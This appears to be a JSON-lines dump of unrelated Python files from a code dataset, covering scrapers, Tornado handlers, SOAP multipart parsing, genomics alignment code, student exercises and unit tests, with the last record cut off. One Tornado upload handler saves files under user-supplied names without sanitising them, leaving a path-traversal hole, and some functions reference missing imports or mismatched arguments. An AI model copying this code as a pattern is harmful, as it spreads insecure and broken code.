print(al_muvs)\n\nnames=[muv.getText() for muv in al_muvs]\nmovie=names[::-1] #[start:stop:step]\n\nwith open(\"movies.txt\",mode=\"w\") as file:\n for muv in movie:\n file.write(f\"{muv}\\n\")\n\n\n","repo_name":"npkeerthi/MustWatchMovies_scrap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"1436732332","text":"from abc import ABC, abstractclassmethod\nfrom datetime import datetime\nimport re\nimport news.parser.parse_dicts as pd\n\n\nclass Value(ABC):\n def __init__(self, value, type_news) -> None:\n self.type_news = type_news\n self.parse_cmd = pd.PARSE_DICT[type_news]\n\n self.__value: str = \"\"\n self.value: str = value\n\n @property\n @abstractclassmethod\n def value(self) -> str:\n pass\n\n @value.setter\n @abstractclassmethod\n def value(self, value) -> str:\n pass\n\n\nclass ArticleName(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"name\"]).text\n\n self.__value = value\n\n\nclass ArticleLink(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"link\"]).get(\"href\")\n\n if self.parse_cmd[\"search_link\"] not in value:\n value = self.parse_cmd[\"create_link\"] + value\n\n self.__value = value\n\n\nclass ArticlePushTime(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"push_time\"]).text\n\n self.__value = value\n\n\nclass ArticleStop(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n date_now = datetime.now().date()\n\n stop_date = value.select_one(self.parse_cmd[\"stop_select\"]).get(\"href\")\n\n parse_date = re.findall(\n r\"/+\\d{4}/+\\d{2}/+\\d{2}|/+\\d{4}/+\\d{2}/+\\d{1}\", stop_date\n )[0]\n\n now_date = datetime.strftime(date_now, \"/%Y/%m/\" + str(date_now.day))\n\n if parse_date != now_date:\n self.__value = True\n else:\n self.__value = False\n\n\nclass ArticalTextContent(Value):\n def __init__(self, value, type_news) -> None:\n self.type_news = type_news\n 
self.parse_cmd = pd.PARSE_DICT\n\n self.__value: str = \"\"\n self.value: str = value\n\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n for key in self.parse_cmd:\n parse_cmd = self.parse_cmd[key]\n\n cont = value.select(parse_cmd[\"text_content\"])\n\n if cont != []:\n value = list([text.text for text in cont])\n break\n\n self.__value = value\n\n\nclass ParseArticle:\n parse_name = ArticleName\n parse_link = ArticleLink\n parse_stop = ArticleStop\n parse_push_time = ArticlePushTime\n\n def __init__(self, article, type_news: str) -> None:\n self.name: str = self.parse_name(article, type_news).value\n self.link: str = self.parse_link(article, type_news).value\n self.stop_iter: str = self.parse_stop(article, type_news).value\n self.push_time: str = self.parse_push_time(article, type_news).value\n self.type_news: str = type_news\n\n","repo_name":"DioSWolF/web_command_project","sub_path":"personal_assistant/news/parser/parse_cls.py","file_name":"parse_cls.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44798144218","text":"# -*- coding: utf-8 -*-\n# @Author: Mehaei\n# @Date: 2020-08-06 17:17:59\n# @Last Modified by: Mehaei\n# @Last Modified time: 2020-08-13 18:47:39\n\nimport tornado.web\nimport os\nimport re\nfrom pycket.session import SessionMixin\nfrom project.config import WORKDIR, GIT_PROJECT_DIR\nfrom helper.tools import excute_cmd_get_result\n# from utils import photo\n\nclass AuthBaseHandler(tornado.web.RequestHandler,SessionMixin):\n def get_current_user(self): #重写get_current_user()方法\n return self.session.get('user_info', None) #session是一种会话状态,跟数据库的session可能不一样\n\n#添加装饰器,装饰需要验证的请求\n# class IndexHandler(AuthBaseHandler):\nclass IndexHandler(tornado.web.RequestHandler):\n \"\"\"\n \"\"\"\n # @tornado.web.authenticated #@tornado.web.authenticated装饰器包裹get方法时,表示这个方法只有在用户合法时才会调用,authenticated装饰器会调用get_current_user()方法获取current_user的值,若值为False,则重定向到登录url装饰器判断有没有登录,如果没有则跳转到配置的路由下去,但是要在app.py里面设置login_url\n def get(self, *args, **kwargs):\n show_file_list = []\n\n search_name = self.get_argument('search_name', None)\n for file_name in os.listdir(GIT_PROJECT_DIR):\n if os.path.isdir(\"%s/%s\" % (GIT_PROJECT_DIR, file_name)):\n if search_name:\n if re.search(search_name, file_name):\n show_file_list.append(file_name)\n else:\n continue\n else:\n show_file_list.append(file_name)\n\n # self.render('index.html')\n work_list = self.get_branch(show_file_list)\n self.render('project_list.html', work_list=work_list)\n\n def get_branch(self, work_list):\n new_work_list = []\n\n cmd = [\"git\", \"branch\"]\n for wdir in work_list:\n os.chdir(\"%s/%s\" % (GIT_PROJECT_DIR, wdir))\n wdir_info = (wdir, excute_cmd_get_result(cmd, rgx=r\"\\*.+\\n\", clean=self.replace_branch, error_return=\"isn't git project\"))\n new_work_list.append(wdir_info)\n\n os.chdir(WORKDIR)\n return new_work_list\n\n def replace_branch(self, strr):\n return strr.strip(\"*| |\\n\")\n\n\nclass ExploreHandler(AuthBaseHandler):\n \"\"\"\n Explore page,photo of other users 发现页-----发现或最近上传的图片页面\n \"\"\"\n @tornado.web.authenticated\n def get(self,*args,**kwargs):\n # image_urls = get_images(\"./static/uploads\") #打开指定路径下的文件,或者static/uploads\n os.chdir('static') # 用于改变当前工作目录到指定的路径\n image_urls = photo.get_images(\"uploads/thumbs\")\n os.chdir(\"..\")\n self.render('explore.html',image_urls=image_urls)\n\nclass PostHandler(AuthBaseHandler):\n \"\"\"\n Single photo page 
and maybe 单个图片详情页面\n \"\"\"\n @tornado.web.authenticated\n def get(self,post_id):\n print(post_id)\n self.render('post.html',post_id = post_id) #根据正则输入的内容,接收到,打开相应的图片\n\n\nclass UploadHandler(AuthBaseHandler): #上传文件\n @tornado.web.authenticated\n def get(self,*args,**kwargs):\n self.render('upload.html')\n\n def post(self,*args,**kwargs):\n file_imgs = self.request.files.get('newImg',None) #获取上传文件数据,返回文件列表\n\n for file_img in file_imgs: #可能同一个上传的文件会有多个文件,所以要用for循环去迭代它\n # filename 文件的实际名字,body 文件的数据实体;content_type 文件的类型。 这三个对象属性可以像字典一样支持关键字索引\n save_to = 'static/uploads/{}'.format(file_img['filename'])\n #以二进制格式打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。一般用于非文本文件如图片等。\n with open(save_to,'wb') as f: #二进制\n f.write(file_img['body'])\n photo.make_thumb(save_to) #同时生成缩略图\n\n self.redirect('/explore')\n","repo_name":"Mehaei/LocalGit","sub_path":"handlers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3693981198","text":"import requests\nimport zlib\nimport json\nfrom typing import Tuple\nimport xml.dom.minidom as minidom\n\ndef clean_whitespace(contents: str) -> str:\n \"\"\" Return the given string with all line breaks and spaces removed.\"\"\"\n lines = [line.strip(\" \\r\\n\") for line in contents.split('\\n')]\n return ''.join(lines)\n\ndef parse_multipart_response(response: requests.Response) -> Tuple:\n content_type_parts = response.headers.get(\"content-type\").split(';')\n boundary = None\n for part in content_type_parts:\n part = part.strip()\n if part.startswith(\"boundary=\"):\n # Content-Type header can contain boundary=\"foo\"\n part = part.replace('\"', \"\")\n boundary = \"--\" + part.replace(\"boundary=\", \"\")\n break\n contents = response.raw.read()\n mime_parts = []\n if boundary:\n # The response was a multipart message and the parts can be processed.\n for part in contents.split(boundary.encode('utf-8')):\n if part:\n mime_parts.append(part)\n return mime_parts, contents\n\ndef get_multipart_soap_and_record_count(\n response_xml_part: bytes) -> Tuple[bytes, int]:\n \"\"\" Return the SOAP part and the record count in the query data response.\n Expecting response_xml_part to be the first part of the MIME multipart response.\n \"\"\"\n return _extract_operational_data_response_and_record_count(response_xml_part)\n\ndef _extract_operational_data_response_and_record_count(\n response_xml_part:bytes) -> Tuple[bytes, int]:\n response_xml = response_xml_part[response_xml_part.index(b\"<?xml\"):]\n dom = minidom.parseString(response_xml)\n record_count = _find_operational_data_response_record_count(dom)\n if record_count is None:\n raise Exception(\"The record count was not found in the operational data response\")\n return (response_xml, _find_operational_data_response_record_count(dom))\n\ndef _find_operational_data_response_record_count(response_xml: minidom.Document) -> int:\n record_count = response_xml.documentElement.getElementsByTagName(\"om:recordsCount\")\n if record_count:\n return int(record_count[0].firstChild.nodeValue)\n return None\n\ndef get_multipart_json_payload(gzipped_json_payload: bytes) -> dict:\n \"\"\" Return the gunzipped JSON payload of the query data response. \"\"\"\n return json.loads(\n _decompress_gzipped_attachment(gzipped_json_payload).decode('utf-8'))\n\ndef get_json_payload_as_string(gzipped_json_payload: bytes) -> str:\n \"\"\" Return the gunzipped JSON payload of the query data response. 
\"\"\"\n json_payload=json.loads(\n _decompress_gzipped_attachment(gzipped_json_payload).decode('utf-8'))\n return json.dumps(json_payload.get(\"records\"),sort_keys=True, indent=4)\n\ndef _decompress_gzipped_attachment(attachment: bytes) -> bytes:\n headers = \\\n b\"\\r\\ncontent-type:application/gzip\\r\\n\" \\\n b\"content-transfer-encoding: binary\\r\\n\" \\\n b\"content-id: <operational-monitoring-data.json.gz>\\r\\n\\r\\n\"\n\n gzipped_payload = attachment[len(headers):].rpartition(b'\\r\\n')[0]\n # From the manual of zlib:\n # 32 + (8 to 15): Uses the low 4 bits of the value as the window size logarithm,\n # and automatically accepts either the zlib or gzip format.\n # +8 to +15: The base-two logarithm of the window size.\n # The input must include a zlib header and trailer.\n decompressed_payload = zlib.decompress(gzipped_payload, 32 + 15)\n return decompressed_payload\n\ndef print_multipart_soap_and_record_count(\n soap_part: bytes, record_count: int, is_client: bool=True):\n print(\"Received the following SOAP response from the \" \\\n \"security server of the %s: \\n\" % (\"client\" if is_client else \"producer\"))\n xml = minidom.parseString(clean_whitespace(soap_part.decode(\"utf-8\")))\n print(xml.toprettyxml())\n print(\"The expected number of JSON records in the response payload: %d\" % (\n record_count,))\n","repo_name":"egobsv/pasarela-tenoli","sub_path":"estadísticas/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31832782694","text":"#!/usr/bin/env python\n\nfrom vdb import *\nimport multiprocessing, sys\n\n'''\ndef f1_a( mgr, ref, del_pos, del_len, ins ) :\n del_pos = 2\n del_len = 1\n ins = \"CCAA\"\n \n print \"ref = '%s' del: %d:%d ins: '%s'\" % ( ref, del_pos, del_len, ins )\n \n ref_var = mgr.make_ref_var( ref, del_pos, del_len, ins )\n \n #q = ref_var.search()\n #qr = ref_var.search_len()\n #print \"query = '%s' at: %d:%d, on ref: %d\" %( q[0], q[2], q[1], qr )\n \n ( a_bases, a_len, a_pos ) = ref_var.allele()\n ar = ref_var.allele_len()\n print \"allele = '%s' at: %d:%d, on ref: %d\" %( a_bases, a_pos, a_len, ar )\n\n#------------------------------------------------------------------------------------------------------------\ndef f1( mgr ):\n ref = \"ACCGGTTAACC\"\n \n del_pos = 2\n del_len = 1\n ins = \"CCAA\"\n\n f1_a( mgr, ref, del_pos, del_len, ins )\n f1_a( mgr, ref, del_pos, del_len, ins ) \n\n#------------------------------------------------------------------------------------------------------------\ndef f2( mgr, acc ) :\n refs = mgr.make_reflist( acc )\n count = refs.count()\n print \"we have %d references:\" % count\n for idx in xrange( count ) :\n print \"\\t No. 
%d\" % idx\n obj = refs.get( idx )\n #print \"\\t\\tidx:\\t%d\" % obj.get_idx()\n rr = obj.get_row_range()\n print \"\\t\\trows:\\t%d..%d\" % ( rr[0], rr[1] )\n #print \"\\t\\tbin:\\t%d\" % obj.get_bin()\n print \"\\t\\tSeqId:\\t%s\" % obj.get_seq_id()\n print \"\\t\\tname:\\t%s\" % obj.get_name()\n print \"\\t\\tlength:\\t%d\" % obj.get_length()\n print \"\\t\\tcirc:\\t%s\" % obj.is_circular()\n print \"\\t\\text:\\t%s\" % obj.is_external()\n #print \"\\t\\tdata:\\t%s\" % obj.read( 0, 50 )\n #print \"\\t\\tid-cnt:\\t%d\" % obj.id_count( rr[ 0 ] )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef num( s ):\n try:\n return int( s )\n except ValueError:\n return 0\n\n\n#------------------------------------------------------------------------------------------------------------\ndef split_cigar( cigar ) :\n res = list()\n op_len = \"\"\n for i in xrange( 0, len( cigar ) ) :\n op = cigar[ i ]\n if op >= '0' and op <= '9' :\n op_len = op_len + op\n else :\n tup = ( num( op_len ), op )\n op_len = \"\"\n res.append( tup )\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef f3( mgr, acc ) :\n cur = mgr.open_db( acc ).open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cols = cur.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n row = read_row( cols, 1 )\n print row\n\n\n#------------------------------------------------------------------------------------------------------------\ndef f4( mgr, acc ) :\n cur = mgr.open_db( acc ).open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cols = cur.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n row_range = cols[ \"READ\" ].range()\n print row_range\n for row in row_range :\n row_data = read_row( cols, row )\n if row % 1000 == 0 :\n sys.stdout.write( '.' )\n sys.stdout.flush()\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar_splitter( cigar, ref_pos, reference ) :\n ops = split_cigar( cigar )\n \n\n#------------------------------------------------------------------------------------------------------------\ndef handle_reference( ref_obj, total, prim_alig_id_col, prim_cols, cigars ) :\n res = total\n ref_rows = ref_obj.get_row_range()\n ref_len = ref_obj.get_length()\n name = ref_obj.get_seq_id()\n #read the whole reference in...\n reference = ref_obj.read( 0, ref_len )\n print \"\\n\", name, ref_len, len( reference )\n # for each row in the reference-table of this reference\n for ref_row in xrange( ref_rows[ 0 ], ref_rows[ 1 ] + 1 ) :\n prim_ids = prim_alig_id_col.read( ref_row )\n #for each alignment in this reference-block\n for prim_id in prim_ids :\n row_data = read_row( prim_cols, prim_id )\n cigar = row_data[ \"CIGAR_SHORT\" ]\n if cigar in cigars.keys() :\n cigars[ cigar ] += 1\n else :\n cigars[ cigar ] = 1\n res += 1\n if res % 1000 == 0 :\n sys.stdout.write( '.' 
)\n sys.stdout.flush()\n return res\n\n\n \n#------------------------------------------------------------------------------------------------------------\ndef f5( mgr, acc, ref_idx = None ) :\n db = mgr.open_db( acc )\n cur_a = db.open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cur_r = db.open_tab( \"REFERENCE\" ).make_cursor()\n refs = db.make_reflist()\n prim_cols = cur_a.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n prim_alig_id_col = cur_r.open( \"PRIMARY_ALIGNMENT_IDS\" )\n total = 0\n cigars = {}\n \n if ref_idx == None :\n # for each reference\n for idx in xrange( refs.count() ) :\n total += handle_reference( refs.get( idx ), total, prim_alig_id_col, prim_cols, cigars ) \n else :\n total += handle_reference( refs.get( ref_idx ), total, prim_alig_id_col, prim_cols, cigars ) \n \n print \"\\nhandled \", total, \" alignments\"\n print \"we have \", len( cigars ), \" different cigar-strings\"\n sorted_cigars = sorted( cigars, key = cigars.get, reverse = True )\n for w in sorted_cigars[ 0 : 10 ] :\n print w, cigars[ w ]\n\n'''\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar2events( cigar ) :\n res = list()\n tmp = \"\"\n for c in cigar :\n if c >= '0' and c <= '9' :\n tmp += c\n else :\n res.append( ( int( tmp ), c ) )\n tmp = \"\"\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef events2dict( events ) :\n res = {}\n for ( len, op ) in events :\n res[ op ] = res.get( op, 0 ) + 1\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef adjacent( events, op1, op2 ) :\n res = 0\n last = 'x'\n for ( len, op ) in events :\n if op == op1 and last == op2 :\n res += 1\n if op == op2 and last == op1 :\n res += 1\n last = op\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar_events( cigar, read, refname, pos ) :\n ref_pos = pos\n ali_pos = 0\n events = cigar2events( cigar )\n for ( len, op ) in events :\n if op == '=' : # we have a perfect match between reference and alignment '='\n ref_pos += len # we advance on alignment AND reference\n ali_pos += len\n\n elif op == 'X' : #we have a mismatch between reference and alignment 'X'\n yield ( refname, ref_pos, 0, read[ ali_pos : ali_pos + len ] )\n ref_pos += len # we advance on alignment AND reference\n ali_pos += len\n\n elif op == 'D' : #we have a deletion on the reference 'D'\n yield ( refname, ref_pos, len, '' )\n ref_pos += len # we advance only on reference\n\n elif op == 'I' : #we have a insertion on the reference 'I'\n yield ( refname, ref_pos, 0, read[ ali_pos : ali_pos + len ] )\n ali_pos += len # we advance only on alignment\n \n elif op == 'S' : #we have a soft clip 'S'\n ali_pos += len # we advance only on alignment\n\n elif op == 'H' : #we have a hard clip 'H'\n ali_pos += 0 # we do nothing\n\n elif op == 'N' : #we have a reference 'N'\n ref_pos += len # we advance on alignment AND reference\n\n else :\n ali_pos += 0 # we do nothing\n\n#------------------------------------------------------------------------------------------------------------\n# a generator of alleles...\ndef alleles( db, row_range = None ) :\n column_list = [ 'CIGAR_LONG', 'READ', 'REF_SEQ_ID', 'REF_POS', 'REF_LEN' ]\n prim_cols = db.open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor().open( column_list )\n for row in 
row_gen( prim_cols, row_range ) :\n cigar = row[ 'CIGAR_LONG' ]\n read = row[ 'READ' ]\n refname = row[ 'REF_SEQ_ID' ]\n refpos = row[ 'REF_POS' ][ 0 ]\n reflen = row[ 'REF_LEN' ][ 0 ]\n for c in cigar_events( cigar, read, refname, refpos, reflen ) :\n yield c\n print\n\n#------------------------------------------------------------------------------------------------------------\ndef refvar_consumer( q, filename ) :\n print( \"refvar_consumer() started\" )\n d = {}\n while True :\n signature = q.get()\n if signature == None :\n break\n d[ signature ] = d.get( signature, 0 ) + 1\n\n f = open( filename, \"w\" )\n for k, v in sorted( [ ( value, key ) for ( key, value ) in d.items() ], reverse=True ) :\n f.write( \"%d %s\\n\" %( k, v ) )\n f.close()\n print( \"refvar_consumer() done\" )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef allel_consumer( mgr, acc, q_in, q_out1, q_out2 ) :\n print( \"allel_consumer() started\" )\n try :\n ref_list = mgr.OpenDB( acc ).ReferenceList()\n curr_ref = None\n ref_bases = None\n while True :\n t = q_in.get()\n if t == None :\n break\n ( ref_name, ref_pos, del_len, bases ) = t\n if curr_ref == None or curr_ref != ref_name :\n curr_ref = ref_name\n try :\n ref_obj = ref_list.find( ref_name )\n ref_bases = ref_obj.Read( 0, ref_obj.SeqLength() )[:]\n except vdb_error as e :\n print( e )\n\n sig1 = \"%s:%d:%d:%s\" % ( ref_name, ref_pos, del_len, bases )\n q_out1.put( sig1 )\n \n if len( bases ) > 0 :\n # we have insertion/mismatch : let's canonicalize it\n ref_var = mgr.RefVariation( ref_bases, ref_pos, del_len, bases )\n ( a_bases, a_len, a_pos ) = ref_var.GetAllele()\n sig2 = \"%s:%d:%d:%s\" % ( ref_name, a_pos, a_len, a_bases )\n else :\n # we have a pure deletion\n sig2 = sig1\n\n q_out2.put( sig2 )\n except vdb_error as e :\n print( e )\n q_out1.put( None )\n q_out2.put( None )\n print( \"allel_consumer() done\" )\n\n\n#------------------------------------------------------------------------------------------------------------ \ndef row_consumer_allel_producer( q_in, q_out ) :\n print( \"row_consumer() started\" )\n while True :\n row = q_in.get()\n if row == None :\n break\n try :\n cigar = row[ 'CIGAR_LONG' ]\n read = row[ 'READ' ]\n refname = row[ 'REF_SEQ_ID' ]\n refpos = row[ 'REF_POS' ][ 0 ]\n for c in cigar_events( cigar, read, refname, refpos ) :\n q_out.put( c )\n except vdb_error as e :\n print( e )\n\n print( \"row_consumer() done\" )\n q_out.put( None )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef row_producer( mgr, acc, row_range, q ) :\n try :\n print( \"row_producer() started\" )\n db = mgr.OpenDB( acc )\n cols = [ 'CIGAR_LONG', 'READ', 'REF_SEQ_ID', 'REF_POS' ]\n prim_cols = db.OpenTable( \"PRIMARY_ALIGNMENT\" ).CreateCursor().OpenColumns( cols )\n for row in row_gen( prim_cols, row_range ) :\n q.put( row )\n q.put( None )\n print( \"row_producer() done\" )\n except vdb_error as e :\n print( e )\n\n\ndef process_accession( mgr, acc, row_range = None ) :\n row_q = multiprocessing.Queue()\n\n p_row_producer = multiprocessing.Process( target = row_producer, args = ( mgr, acc, row_range, row_q ), )\n\n allel_q = multiprocessing.Queue()\n \n p_row_cons = multiprocessing.Process( target = row_consumer_allel_producer, args = ( row_q, allel_q ), ) \n \n refvar_q1 = multiprocessing.Queue()\n refvar_q2 = multiprocessing.Queue()\n \n p_allel_cons = multiprocessing.Process( target = allel_consumer, args = ( 
mgr, acc, allel_q, refvar_q1, refvar_q2 ), )\n\n p_refvar1 = multiprocessing.Process( target = refvar_consumer, args = ( refvar_q1, \"ref_var_1.txt\" ), )\n p_refvar2 = multiprocessing.Process( target = refvar_consumer, args = ( refvar_q2, \"ref_var_2.txt\" ), )\n \n p_row_producer.start()\n p_row_cons.start()\n p_allel_cons.start()\n p_refvar1.start()\n p_refvar2.start()\n \n p_row_producer.join() \n p_row_cons.join()\n p_allel_cons.join()\n p_refvar1.join()\n p_refvar2.join()\n\n\n#------------------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n ACC = \"SRR1531793\"\n \n if len( sys.argv ) > 1 :\n ACC = sys.argv[ 1 ]\n\n mgr = manager( OpenMode.Read )\n process_accession( mgr, ACC )\n #f1( mgr )\n","repo_name":"ncbi/ncbi-vdb","sub_path":"py_vdb/ref_var.py","file_name":"ref_var.py","file_ext":"py","file_size_in_byte":13436,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"3"} +{"seq_id":"33216112497","text":"array = ['1. Apple', '2. Melon', '3. Banana', '4. Orange']\ndata = [\n {'menu1': 9000},\n {'menu2': 1000},\n {'menu3': 8000},\n]\n\n# indexing = array.index('Apple')\n# checkIndex = int(input('Masukkan angka index: '))\n\n# if(checkIndex-1 == indexing):\n# print('Apple')\n# else:\n# print('Buah yang lain')\n\nstring = 'hi my name is Luthfir'\n\n# print(isinstance(string, str))\nprint(string[3:])\n\n# for i, x in enumerate(array):\n# print(f\"{i+1}. {x}\")\n\n# for x in data:\n# print(x['menu1'] + \"menu1\")\n","repo_name":"luthfirrahmanb/purwadhika_data_science_module1","sub_path":"tryIndex.py","file_name":"tryIndex.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69944335122","text":"from scipy.stats import chisquare\n\nN=int(input(\"Enter the number of times experiment is performed\"))\nclasses=int(input(\"Enter the interval/classes\"))\n\nexpected=[]\n\nfor i in range(0,classes):\n\texpected.append(N/classes) \n\nprint(\"Enter the outcomes\") \n\nactual=[]\n\nfor i in range(0,classes):\n\tx=int(input(str(i+1)))\n\nactual.append(x) \nx=chisquare(actual,expected) \nprint(x)","repo_name":"championballer/labs","sub_path":"Modeling and Simulation/chi.py","file_name":"chi.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23149704951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 11:02:36 2021\n\n@author: vikas.maurya\n\"\"\"\n'''\nQuestions:\n1.The data file contains numerical attributes that describe a letter and its\ncorresponding class. Read the datafile “letterCG.data” and set all the numerical attributes\n as features.Split the data in to train and test sets.\n \n2. 
Fit a sequence of AdaBoostClassifier\nwith varying number of weak learners ranging from 1 to 16, keeping the max_depth as 1.\nPlot the accuracy on test set against the number of weak learners.\nUse decision tree classifier as the base classifier.\n\n3. Repeat step 2 with max_depth set as 2.\n\n'''\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilePath=\"C:\\\\Users\\\\vikas.maurya\\\\Desktop\\\\AanlyticsAssignment_Edureka\\\\Model_selection_and_Boosting\\\\letterCG.bin\"\n\ndata=pd.read_csv(filePath,sep=' ')\n\n\ndata.drop([\"Unnamed: 5\", \"Unnamed: 18\", \"yegvx\"], axis=1, inplace=True)\ndata = data.fillna(0)  # fillna returns a new frame; assign it back\n\n\n\nX=data.iloc[:,1:]\nY=data[\"Class\"]\n\ndata.head()\n\n\n\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split\n\ntrain_x, test_x, train_y, test_y = train_test_split(\n    X, Y, random_state=5, test_size=0.30)\n\n\n\n# Step 2: fit AdaBoost with 1 to 16 weak learners (max_depth=1) and track test accuracy\nweak_learners = list(range(1, 17))\n\nbase_class = DecisionTreeClassifier(max_depth=1)\n\naccuracies = []\nfor n_est in weak_learners:\n    ada_Boost = AdaBoostClassifier(\n        base_estimator=base_class, n_estimators=n_est, learning_rate=1, algorithm='SAMME')\n    ada_Boost.fit(train_x, train_y)\n    predicted = ada_Boost.predict(test_x)\n    accuracies.append(metrics.accuracy_score(predicted, test_y))\n\nplt.plot(weak_learners, accuracies)\nplt.xlabel(\"number of weak learners\")\nplt.ylabel(\"accuracy on test set (max_depth=1)\")\nplt.show()\n\nimport seaborn as sns\nsns.countplot(predicted)  # class distribution predicted by the last (16-learner) model\n\n# Step 3: repeat with max_depth=2\nbase_class = DecisionTreeClassifier(max_depth=2)\n\naccuracies = []\nfor n_est in weak_learners:\n    ada_Boost = AdaBoostClassifier(\n        base_estimator=base_class, n_estimators=n_est, learning_rate=1, algorithm='SAMME')\n    ada_Boost.fit(train_x, train_y)\n    predicted = ada_Boost.predict(test_x)\n    accuracies.append(metrics.accuracy_score(predicted, test_y))\n\nplt.plot(weak_learners, accuracies)\nplt.xlabel(\"number of weak learners\")\nplt.ylabel(\"accuracy on test set (max_depth=2)\")\nplt.show()\n\n\n\n","repo_name":"vikas972/Analytics_course","sub_path":"Model_selection_and_Boosting/Case_Study_3_Model_Selection.py","file_name":"Case_Study_3_Model_Selection.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73164306320","text":"import os\nfrom typing import Any\nfrom unittest.mock import MagicMock, call, patch\n\nfrom hypothesis import given\nfrom hypothesis import strategies as st\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom macaron.config.target_config import Configuration\nfrom macaron.output_reporter.reporter import HTMLReporter, JSONReporter\nfrom macaron.output_reporter.results import Record, Report, SCMStatus\n\nfrom ..macaron_testcase import MacaronTestCase\nfrom ..st import JINJA_CONTEXT_DICT\n\nROOT_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\nclass MockRecord(Record):\n    \"\"\"A mock class for the record.\"\"\"\n\n    def __init__(self, mock_data: dict) -> None:\n        super().__init__(\n            record_id=\"record\",\n            description=\"sample_desc\",\n            pre_config=Configuration({}),\n            status=SCMStatus.AVAILABLE,\n            context=MagicMock(),\n            dependencies=[],\n        )\n        self.mock_data = mock_data\n\n    def get_dict(self) -> dict:\n        return self.mock_data\n\n\nclass TestHTMLReporter(MacaronTestCase):\n    \"\"\"Test the HTMLReporter class.\"\"\"\n\n    def test_no_html_template_found(self) -> None:\n        \"\"\"Test initializing a HTMLReporter instance with a non-existing template.\"\"\"\n        no_template_reporter = HTMLReporter(target_template=\"not_exist_template.html\")\n        assert not no_template_reporter.template\n\n    @given(mock_data=JINJA_CONTEXT_DICT, num_dep=st.integers(min_value=0, max_value=3))\n    def test_gen_json_reports(self, mock_data: Any, num_dep: int) -> None:\n        \"\"\"Test if JSONReporter can 
print JSON files without errors.\"\"\"\n report = Report(MockRecord(mock_data))\n for _ in range(num_dep):\n report.root_record.dependencies.append(MockRecord(mock_data))\n\n reporter = JSONReporter()\n\n with patch(\"builtins.open\") as mock_open:\n reporter.generate(\"report_paths\", report)\n calls = [call(os.path.join(\"report_paths\", \"dependencies.json\"), mode=\"w\", encoding=\"utf-8\")]\n mock_open.assert_has_calls(calls)\n\n @given(mock_data=JINJA_CONTEXT_DICT, num_dep=st.integers(min_value=0, max_value=3))\n def test_gen_html_reports(self, mock_data: Any, num_dep: int) -> None:\n \"\"\"Test if HTMLReporter can print HTML files without errors.\"\"\"\n report = Report(MockRecord(mock_data))\n for _ in range(num_dep):\n report.root_record.dependencies.append(MockRecord(mock_data))\n\n custom_jinja_env = Environment(\n loader=FileSystemLoader(ROOT_PATH),\n autoescape=select_autoescape(enabled_extensions=[\"html\", \"j2\"]),\n trim_blocks=True,\n lstrip_blocks=True,\n )\n\n reporter = HTMLReporter(env=custom_jinja_env, target_template=\"template.html\")\n with patch(\"builtins.open\") as mock_open:\n reporter.generate(\"report_paths\", report)\n mock_open.assert_called()\n","repo_name":"oracle/macaron","sub_path":"tests/output_reporter/test_reporter.py","file_name":"test_reporter.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"3"} +{"seq_id":"70365649682","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport 